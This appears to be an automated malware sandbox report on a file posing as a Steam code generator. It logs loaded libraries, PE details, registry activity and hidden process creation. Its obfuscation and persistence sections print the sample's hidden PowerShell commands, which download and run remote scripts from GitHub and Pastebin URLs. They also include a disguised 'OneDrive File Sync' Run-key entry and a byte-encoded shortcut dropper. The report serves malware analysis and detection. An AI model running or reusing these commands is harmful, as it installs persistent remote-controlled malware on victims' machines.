Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: BeginSync.lnk.6.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: steamcodegenerator.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: steamcodegenerator.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb&& source: steamcodegenerator.exe, 00000000.00000002.3398804242.0000020C74740000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398881078.0000020C74774000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: dC:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb source: steamcodegenerator.exe, 00000000.00000002.3398804242.0000020C74740000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398881078.0000020C74774000.00000002.10000000.00040000.00000000.sdmp
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: steamcodegenerator.exeStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34783483 push edi; iretd 6_2_00007FFD34783486
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34783858 push E8FFFFFFh; iretd 6_2_00007FFD3478385D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348460F4 push eax; ret 6_2_00007FFD3484613D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD34846DC3 push edi; iretd 13_2_00007FFD34846DC6

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
